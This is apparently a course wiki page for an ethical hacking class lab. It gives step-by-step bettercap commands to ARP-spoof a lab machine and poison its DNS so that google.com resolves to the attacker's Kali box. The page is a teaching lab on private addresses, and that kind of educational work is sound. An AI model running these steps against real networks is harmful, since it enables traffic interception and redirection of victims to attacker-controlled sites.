0.00 Class 3 Lab2 DNS Poisoning V1 - cloudsecuritylabs/ethicalhackingclass GitHub Wiki
DNS Poisoning
Prepare Kali Box
- sudo apt udpate
- sudo apt install bettercap
- sudo apt install nginx
- sudo service nginx start
- go to localhost and see if a site is displayed.
Enable promiscuous mode
We need to ensure promiscuous mode is on for the interface we are using
- ifconfig eth0 promisc
- echo 1 > /proc/sys/net/ipv4/ip_forward
Attack
Get Ready
- log in to test machine to attack
- check IP and ARP -a before attack
Start and set up bettercap
- run arp - a before attack
- sudo bettercap
- set arp.spoof.targets [Target IP: 192.168.1.114]
- at this time ARP table content should have changed.
- check arp table
- set dns.spoof.domains google.com
- set dns.spoof.address [KALI Machine IP - 192.168.1.105]
Check results
- try to go to google.com from machine under attack